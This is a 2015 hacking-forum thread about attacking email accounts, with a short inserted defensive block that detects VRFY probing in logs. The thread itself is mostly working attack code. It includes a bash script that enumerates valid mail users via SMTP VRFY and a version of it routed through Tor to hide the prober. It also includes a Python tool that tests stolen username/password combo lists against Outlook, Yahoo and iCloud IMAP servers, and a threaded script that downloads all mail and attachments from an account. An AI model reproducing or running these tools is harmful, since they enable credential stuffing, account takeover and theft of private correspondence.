18-05-2015, 16:16
iTick (x64 has PIC)
Posts: 648 | Registered: Jul 2013 | Reputation: 47

Testing for valid users via SMTP and VRFY from Linux bash

If you need to test whether a user has a mail account on a given mail server, you can use the script below to test whether the user exists.
The script is invoked with:

```
./mailusers.sh users.txt mail.example.com > valid.txt
```

The file users.txt contains a list of presumed valid usernames. Perhaps these were guessed, ripped from a website, found with TheHarvester, or similar.
mail.example.com is the mail server you want to test against.
The output is sent to the file "valid.txt".

```bash
#!/bin/bash
# Invoked with ./mailusers.sh <userlist> <mailserver> > output.txt
for user in $(cat $1);
do
    echo "vrfy $user" | nc -q 2 $2 25 | grep "^252 " | cut -f3 -d" " &
done
```

mailusers.sh must of course be made executable with:

```
$ chmod u+x mailusers.sh
```

I hope someone can use it. It's really quite simple.
Once the script has connected to the mail server with netcat on port 25, it issues a "vrfy <username>".
If the user exists, the mail server gives a return code "252", which means that the user exists, and if the user does not exist, a return code "550" is given.
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
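
The server-side view of the probing described in the post above, as an added example that is not part of the original thread: it counts VRFY commands and their 550 replies per client in an SMTP command log. The log format (`timestamp client_ip command argument reply_code`), the sample lines and the threshold are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): flag clients that issue many VRFY
# commands, which is what a loop over a username list looks like to the server.
# Assumed, constructed log format:
#   <timestamp> <client_ip> <command> <argument> <reply_code>

# Constructed sample log; addresses come from documentation ranges.
sample_log() {
cat <<'EOF'
2015-05-18T16:20:01 203.0.113.7 vrfy alice 252
2015-05-18T16:20:01 203.0.113.7 vrfy bob 550
2015-05-18T16:20:02 203.0.113.7 vrfy carol 550
2015-05-18T16:20:02 203.0.113.7 vrfy dave 252
2015-05-18T16:20:03 203.0.113.7 VRFY eve 550
2015-05-18T16:21:10 198.51.100.20 EHLO mx.example.org 250
2015-05-18T16:21:10 198.51.100.20 MAIL FROM:<news@example.org> 250
2015-05-18T16:21:11 198.51.100.20 RCPT TO:<alice@example.com> 250
2015-05-18T16:25:40 198.51.100.20 VRFY postmaster 252
EOF
}

# vrfy_report THRESHOLD
# Reads the log on stdin and prints "ip total_vrfy rejected_550" for every
# client with at least THRESHOLD VRFY commands. A burst of VRFYs with a high
# share of 550 replies is the signature of username guessing.
vrfy_report() {
    awk -v min="$1" '
        toupper($3) == "VRFY" {
            total[$2]++
            if ($5 == "550") rejected[$2]++
        }
        END {
            for (ip in total)
                if (total[ip] >= min)
                    printf "%s %d %d\n", ip, total[ip], rejected[ip] + 0
        }' | sort
}

# Report clients with four or more VRFY commands in the sample.
sample_log | vrfy_report 4
```

Where VRFY is not needed, it can be switched off at the server; on Postfix the setting is `disable_vrfy_command = yes`.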

18-05-2015, 19:37
iTick (x64 has PIC)
Posts: 648 | Registered: Jul 2013 | Reputation: 47

RE: Testing for valid users via SMTP and VRFY from Linux bash

(18-05-2015, 19:08) Doctor Blue wrote: I hadn't really thought about there being a command for it. It naturally makes sense, since it means servers don't start sending the whole e-mail if the mailbox doesn't exist anyway.

Yes, it's actually quite practical. Even though it can be abused.

18-05-2015, 21:14
Spagnum (Organizer)
Posts: 678 | Registered: Mar 2013 | Reputation: 24

RE: Testing for valid users via SMTP and VRFY from Linux bash

Quite clever... I have some Python code that does the same, but even easier directly from bash..
Don't learn to hack, hack to learn

18-05-2015, 21:18
iTick (x64 has PIC)
Posts: 648 | Registered: Jul 2013 | Reputation: 47

RE: Testing for valid users via SMTP and VRFY from Linux bash

(18-05-2015, 21:14) Spagnum wrote: Quite clever... I have some Python code that does the same, but even easier directly from bash..

If it's something you want to share, you're welcome to. I probably have a Python version too, but it would be nice to see how others do it.
Especially if it's simple. :)

18-05-2015, 21:33
(This post was last modified: 19-05-2015, 10:56 by Spagnum.)
Spagnum (Organizer)
Posts: 678 | Registered: Mar 2013 | Reputation: 24

RE: Testing for valid users via SMTP and VRFY from Linux bash

It's not something I coded myself, found it on the net once, but I'll have to dig it out when I get the chance :)
Edit:
It was already here:
https://shellsec.pw/traad-accountchecker

19-05-2015, 15:13
(This post was last modified: 19-05-2015, 15:13 by Doctor Blue.)
Doctor Blue (Administrator)
Posts: 2.350 | Registered: Feb 2013 | Reputation: 51

RE: Testing for valid users via SMTP and VRFY from Linux bash

(18-05-2015, 21:33) Spagnum wrote: It's not something I coded myself, found it on the net once, but I'll have to dig it out when I get the chance :)
Edit:
It was already here:
https://shellsec.pw/traad-accountchecker

Ah yes, but yours tests username/password combinations. iTick's only checks whether the mailbox exists :)
If we're sharing that kind of thing, I've also made a couple of scripts. The last of these also has threading to speed it up a bit.

check_email.py (Checks combo lists against a few different free hosts)
```python
#!/usr/bin/python
# This tool checks user/pass combinations against common mail servers
import os
import poplib
import imaplib
import email
import quopri
import datetime
import uuid
import socket
import re
import string

# Some services are skipped on purpose because they are impossible or
# a waste of time, namely:
# - GMail - POP/IMAP must be enabled from the website
# - Stofanet - Username is not related to the email address, can't be guessed
# - TDC - Users have random passwords on registration
providers = {
    'Outlook': {
        'proto': 'IMAP',
        'server': 'imap-mail.outlook.com',
        'port': 993,
        'domains': ['live.com', 'live.dk', 'hotmail.com', 'hotmail.dk', 'msn.com', 'msn.dk', 'outlook.com', 'outlook.dk']
    },
    'Yahoo': {
        'proto': 'IMAP',
        'server': 'imap.mail.yahoo.com',
        'port': 993,
        'domains': ['yahoo.com', 'yahoo.dk', 'ymail.com', 'rocketmail.com']
    },
    'iCloud': {
        'proto': 'IMAP',
        'server': 'imap.mail.me.com',
        'port': 993,
        'domains': ['me.com', 'icloud.com', 'mac.com'],
    }
}

autoflush = True  # Flush on every write to outfile
infilename = "combolist.txt"
outfilename = "working-mails.txt"

# Find the provider for a given domain
def getprovider(address):
    domain = address.split("@")[-1]
    for provider in providers:
        provider = providers[provider]
        if domain in provider['domains']:
            return provider
    return False

# Check a POP3 account
def trypop(server, port, address, password):
    conn = poplib.POP3_SSL(server, port)
    conn.user(address)
    try:
        conn.pass_(password)
    except (UnicodeEncodeError, poplib.error_proto) as ex:
        print(ex)
        return False
    conn.quit()
    return True

# Check an IMAP4 account
def tryimap(server, port, address, password):
    conn = imaplib.IMAP4_SSL(server, port)
    try:
        conn.login(address, password)
        conn.logout()
    except (UnicodeEncodeError, imaplib.IMAP4.error) as ex:
        print(ex)
        return False
    return True

# Determine protocol and call appropriate function
def trymail(provider, user):
    if provider['proto'] == "IMAP":
        return tryimap(provider['server'], provider['port'], user[0], user[1])
    elif provider['proto'] == "POP":
        return trypop(provider['server'], provider['port'], user[0], user[1])
    else:
        return False

infile = open(infilename, 'r')
with open(outfilename, 'a') as outfile:
    for address in infile:
        address = address.rstrip()
        if "@" in address:
            user = address.split(":")
            provider = getprovider(user[0])
            if not provider:
                print("SKIP - " + address)
            elif trymail(provider, user):
                print("OKAY - " + address)
                outfile.write(address + "\n")
                if autoflush: outfile.flush()
            else:
                print("FAIL - " + address)
```

dump_email.py (Dumps all of the user's mail via IMAP)
```python
#!/usr/bin/python
# Standard libraries
import os
import re
import uuid
import email
import imaplib
import datetime
import threading
# Non-standard libraries (Must be installed)
import imapclient

# Script settings
imaplib._MAXLINE = 1000000  # Disregard imaplib's 10K byte limit by overriding to 1M
basedir = "E-mails"  # Base directory for downloaded mails
alphanumrx = re.compile('[\W_]+')  # Regex for removing non-alphanumeric characters from a string
server = "imap-mail.outlook.com"
port = 993
user = ""
password = ""

# Utility functions
def split_seq(seq, num_pieces):
    start = 0
    for i in range(num_pieces):
        stop = start + len(seq[i::num_pieces])
        yield seq[start:stop]
        start = stop

# Class definition
class IMAPDumper:
    def __init__(self, server, port, username, password):
        # Connection info
        self.server = server
        self.port = port
        self.username = username
        self.password = password
        self.mailbox = None  # Current mailbox, used when reconnecting
        self.mboxdir = None
        self.connect()

    def connect(self):
        self.conn = imapclient.IMAPClient(self.server, self.port, ssl=True)
        self.conn.login(self.username, self.password)
        if self.mailbox is not None:
            self.conn.select_folder(self.mailbox, readonly=True)

    def reconnect(self, error):
        print("Connection failed: %s" % error)
        print("Reconnecting")
        self.connect()

    def enumerateMailboxes(self):
        print("Getting mailbox list")
        mailboxes = self.conn.list_folders()
        # Filter out strings I don't understand
        mailboxes2 = []
        for mailbox in mailboxes:
            if not isinstance(mailbox, str):
                mailboxes2.append(mailbox[2])
        return mailboxes2

    def enumerateMails(self, mailbox):
        # Get UIDs for mails in mailbox
        print("Enumerating mails in %s" % mailbox)
        self.setMailbox(mailbox)
        while True:
            try:
                maillist = self.conn.search(['ALL'])
                break
            except (imaplib.error, imapclient.IMAPClient.Error) as ex:
                self.reconnect(ex)
        # Create a directory to download the mails into if it doesn't already exist
        if not os.path.exists(self.mboxdir):
            os.makedirs(self.mboxdir)
        print(" Added %d to queue" % len(maillist))
        return maillist

    def setMailbox(self, mailbox):
        self.conn.select_folder(mailbox, readonly=True)
        self.mailbox = mailbox
        self.mboxdir = os.path.join(basedir, self.username, self.mailbox)

    def fetchMail(self, mailid):
        while True:
            try:
                filename = os.path.join(self.mboxdir, str(mailid) + ".txt")
                # Check if mail is already downloaded
                if not os.path.exists(filename) or os.path.getsize(filename) == 0:
                    # Download and save e-mail
                    mail = self.conn.fetch(mailid, ['BODY.PEEK[]'], None)[mailid]['BODY[]']
                    with open(filename, "w", encoding="utf-8") as f:
                        f.write(mail)
                    # Save attachments to separate file
                    self.saveAttachments(mailid, mail)
                break
            except Exception as ex:
                raise
                #self.reconnect(ex)

    def saveAttachments(self, uid, mailtext):
        mail = email.message_from_string(mailtext)
        for part in mail.walk():
            # Determine if part is an attachment
            if part.get_content_maintype() == 'multipart' or part.get('Content-Disposition') is None:
                continue
            # Get extension and generate random filename (.bin on unknown MIME type)
            filename = part.get_filename()
            if filename is None:
                filename = str(uuid.uuid4()) + ".bin"
            else:
                ext = alphanumrx.sub('', filename.split(".")[-1])
                filename = str(uuid.uuid4()) + "." + ext
            # Write attachment to file
            filepath = os.path.join(self.mboxdir, str(uid) + "_" + filename)
            with open(filepath, 'bw') as f:
                try:
                    f.write(part.get_payload(decode=True))
                except AssertionError as ex:
                    pass

# Worker class for multithreading
class Worker(threading.Thread):
    def __init__(self, server, port, user, password, mailbox, maillist):
        threading.Thread.__init__(self)
        self.maillist = maillist

    def run(self):
        self.dumper = IMAPDumper(server, port, user, password)
        self.dumper.setMailbox(mailbox)
        for mailid in self.maillist:
            print("Fetching %d" % mailid)
            self.dumper.fetchMail(mailid)

# Run script
print("Starting...")
dumper = IMAPDumper(server, port, user, password)
mailboxes = dumper.enumerateMailboxes()
for mailbox in mailboxes:
    maillist = dumper.enumerateMails(mailbox)
    ### THREADED APPROACH
    print("Starting worker threads")
    threads = []
    for list in split_seq(maillist, 25):
        threads.append(Worker(server, port, user, password, mailbox, list))
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    ### UNTHREADED APPROACH
    #mailcounter = 0
    #for mailid in maillist:
    #    mailcounter += 1
    #    print("[%d/%d] Fetching %d\r" % (mailcounter, len(maillist), mailid), end="")
    #    dumper.fetchMail(mailid)
```

19-05-2015, 15:29
(This post was last modified: 19-05-2015, 15:38 by iTick.)
iTick (x64 has PIC)
Posts: 648 | Registered: Jul 2013 | Reputation: 47

RE: Testing for valid users via SMTP and VRFY from Linux bash

Nice. :) You are the master. I bow to you Doctor Blue. :)
As you say, my mini script only looks for valid mailboxes.
So that I only spend time on gaining access to the accounts that actually exist.

```bash
#!/bin/bash
# By iTick
# Invoked with ./mailusers.sh <userlist> <server ip> > output.txt
for user in $(cat $1);
do
    echo "vrfy $user" | proxychains nc -n -w 4 $2 25 | grep "^252 " | cut -f3 -d" " &
done
```

The above is not particularly stable, but it works through Tor.
It has some trouble with the DNS lookup, so I chose to make it work only on the IP address and added -n to netcat.
Tor must of course be installed.
On Kali:

```
# apt-get install tor
# service tor start
```

And then /etc/proxychains.conf must be set to:

```
socks4 127.0.0.1 9050
```

If anyone has a better method, I'd like to hear your ideas.